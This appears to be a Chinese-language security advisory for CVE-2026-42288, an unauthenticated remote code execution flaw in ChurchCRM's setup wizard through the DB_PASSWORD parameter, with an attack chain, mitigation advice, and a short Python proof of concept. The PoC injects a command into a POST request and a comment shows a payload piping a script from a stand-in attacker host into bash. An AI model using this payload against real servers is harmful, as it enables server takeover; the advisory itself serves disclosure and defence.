CVE-2026-42288 CVSS 10.0 严重

CVE-2026-42288 ChurchCRM远程代码执行漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42288

漏洞类型

远程代码执行

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ChurchCRM

漏洞概述

ChurchCRM是一个开源的教会管理系统软件。在7.3.2版本之前，系统针对CVE-2026-39337的修复措施并不完整。攻击者可以利用设置向导中未经过滤的DB_PASSWORD参数，在无需任何身份认证的情况下触发严重的远程代码执行漏洞。该漏洞允许攻击者接管服务器，已在7.3.2版本中修复。

技术细节

该漏洞的核心原因在于ChurchCRM设置向导对用户输入的DB_PASSWORD参数缺乏足够的过滤和验证。尽管官方此前尝试修复相关漏洞（CVE-2026-39337），但修复方案并不完整，留下了安全后门。攻击者无需通过身份认证，即可直接向易受攻击的端点发送特制的HTTP请求。在请求中，攻击者将恶意的系统命令或代码注入到DB_PASSWORD字段中。服务器在处理安装或配置逻辑时，会将该未经过滤的参数值写入关键配置文件或传递给易受攻击的函数，最终导致服务器端执行任意恶意代码。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别出互联网上运行ChurchCRM且版本低于7.3.2的目标服务器。

STEP 2

步骤2：访问设置向导

攻击者直接访问ChurchCRM的设置向导页面，该页面无需身份验证即可访问。

STEP 3

步骤3：漏洞利用

攻击者构造包含恶意代码的HTTP POST请求，将其注入到DB_PASSWORD参数中。

STEP 4

步骤4：代码执行

服务器端处理请求时，由于未对DB_PASSWORD进行过滤，导致恶意代码在系统上下文中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the ChurchCRM setup wizard
target_url = "http://target-ip/setup.php"

# The vulnerability exists in the DB_PASSWORD parameter during setup.
# Since the input is unsanitized, we can inject a payload to achieve RCE.
# This example assumes a command injection context or a similar eval-based execution.
# Payload example: `; curl http://attacker-server/shell.sh | bash`

malicious_payload = "; id;" 

data = {
    "DB_HOST": "localhost",
    "DB_USER": "root",
    "DB_NAME": "churchcrm",
    "DB_PASSWORD": malicious_payload,
    "Step": "3"  # Assuming the vulnerable step in the wizard
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check for code execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

ChurchCRM < 7.3.2

防御指南

临时缓解措施

如果无法立即升级，请通过WAF规则拦截对/setup路径的请求，或在网络层面阻断外部对安装向导的访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表